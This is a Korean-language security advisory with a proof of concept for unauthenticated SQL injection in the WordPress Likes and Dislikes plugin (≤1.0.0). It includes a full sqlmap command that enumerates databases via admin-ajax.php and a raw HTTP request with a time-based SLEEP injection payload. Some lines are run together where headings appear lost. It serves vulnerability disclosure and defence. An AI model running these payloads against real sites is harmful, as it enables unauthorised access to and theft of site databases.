
WordPress Likes and Dislikes 플러그인 <= 1.0.0은 SQL 인젝션에 취약합니다.
발견자: Khaled_Alenazi (Nxploited)
게시일: 2025년 5월 27일
WordPress용 좋아요 및 싫어요 플러그인은 모든 버전 1.0.0 이하에서 post 매개변수를 통해 SQL 삽입에 취약합니다.
부적절한 이스케이프 및 준비된 구문(Prepared Statement) 부재로 인해 인증되지 않은 공격자가 백엔드 쿼리에 원시 SQL을 주입하여 데이터 유출 또는 조작을 초래할 수 있습니다.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
이 명령어는 주입 지점을 확인하고 시간 기반 기술을 사용하여 데이터베이스를 열거합니다.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
SQLMap 열거:
boolean 기반 블라인드 및 시간 기반 블라인드 SQLi 탐지.db, test, information_schema.
Burp Suite를 이용한 수동 검증:
15초를 초과하여 실제 주입을 나타냄.
post 입력을 즉시 삭제 및 매개변수화하십시오.이 콘텐츠는 교육 및 연구 목적으로만 제공됩니다.
저자는 명시적 승인 없이 시스템을 악의적으로 사용하거나 익스플로잇하는 것을 허용하지 않습니다.
Khaled_Alenazi (Nxploited)